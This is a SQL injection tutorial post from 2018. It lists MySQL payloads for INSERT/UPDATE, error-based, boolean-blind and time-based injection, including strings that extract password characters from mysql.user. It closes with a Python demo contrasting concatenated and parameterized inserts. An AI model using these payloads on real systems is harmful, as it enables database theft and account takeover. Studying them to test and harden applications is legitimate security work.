General SQL Injection (Part 2)
阿新 • Published: 2018-07-06
General MySQL Injection (Part 2)
1. General MySQL injection (INSERT, UPDATE)

The ordinary PHP mysql_query() call does not support multi-statement execution; mysqli does. INSERT injection mostly relies on error-based injection.

   1) If rows can be inserted directly, an administrator account can be inserted and used directly:
      insert into user(username,password) values('xxxx','xxxx'),('dddd','dddd')/* ');
   2) If some data can be inserted and that data is later displayed on a page, it can be combined with XSS and CSRF to obtain cookies or get a shell.

UPDATE injection works the same way.

2. MySQL error-based injection

   1) and(select 1 from(select count(*),concat((select (select (query)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
      In the (query) position put an ordinary single statement, e.g.:
      SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1
   2) and+1=(select+*+from+(select+NAME_CONST((query),1),NAME_CONST((query),1))+as+x)--
   3) update web_ids set host='www.0x50sec.org' where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (query)),1,62)))a from information_schema.tables group by a)b);
   4) insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (query)),1,62)))a from information_schema.tables group by a)b)));

3. General MySQL blind injection

   Using ascii():
      AND ascii(substring((SELECT password FROM users where id=1),1,1))=49
   Using a regular expression:
      and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)

4. MySQL time-based blind injection

   1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode('msg','by 5 seconds')),null) from (select database() as current) as tbl
   UNION SELECT IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root'

5. MySQL version-specific features

   1) MySQL 5.0 and later: the information_schema database is available
   2) MySQL 5.1 and later: UDFs are loaded from the xx\lib\plugin\ directory
   3) MySQL 5.x and later: the system command executes OS commands
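The fix for the INSERT/UPDATE injection described in section 1 is to bind user input as query parameters instead of splicing it into the SQL text. The following Python example is added here and is not code from the original post. It uses an in-memory SQLite database as a stand-in for MySQL (an assumption; with a MySQL DB-API driver such as PyMySQL the pattern is the same, except that the placeholder is %s rather than ?) and runs the multi-row VALUES payload from section 1 through a string-concatenated insert and a parameterized one, so the difference in stored rows is visible.

```python
import sqlite3

# Constructed fixture: an in-memory SQLite database stands in for MySQL (assumption).
# The DB-API 2.0 calls below are the same with a MySQL driver, apart from the
# placeholder style (MySQL drivers use %s, SQLite uses ?).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    return conn


def insert_user_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> None:
    # Vulnerable: the caller's strings become part of the SQL text, so a value that
    # closes the intended tuple can append a second row and comment out the tail.
    sql = "INSERT INTO user(username, password) VALUES('%s', '%s')" % (username, password)
    conn.execute(sql)
    conn.commit()


def insert_user_safe(conn: sqlite3.Connection, username: str, password: str) -> None:
    # Hardened: values are bound as parameters and are never parsed as SQL,
    # whatever quotes, parentheses or comment markers they contain.
    conn.execute("INSERT INTO user(username, password) VALUES(?, ?)", (username, password))
    conn.commit()


def list_users(conn: sqlite3.Connection) -> list:
    return conn.execute("SELECT username, password FROM user ORDER BY rowid").fetchall()


# Constructed payload in the shape section 1 shows: ends the intended tuple, adds a
# second row ('dddd','dddd') and opens a comment that swallows the trailing "')".
PAYLOAD = "xxxx'),('dddd','dddd')/*"


def demo() -> tuple:
    """Return (rows after vulnerable insert, rows after parameterized insert)."""
    vuln = make_db()
    insert_user_vulnerable(vuln, "alice", PAYLOAD)

    safe = make_db()
    insert_user_safe(safe, "alice", PAYLOAD)

    return list_users(vuln), list_users(safe)


if __name__ == "__main__":
    vuln_rows, safe_rows = demo()
    # The concatenated version stores two rows, one of them attacker-chosen;
    # the parameterized version stores exactly one row with the literal payload.
    print("string-concatenated insert:", vuln_rows)
    print("parameterized insert:      ", safe_rows)
```

The same discipline covers the UPDATE case: a SET or WHERE value bound as a parameter cannot carry the subquery-based payloads of section 2. Note also that the unterminated /* comment is accepted silently by the parser, which is why a malformed-looking payload still executes.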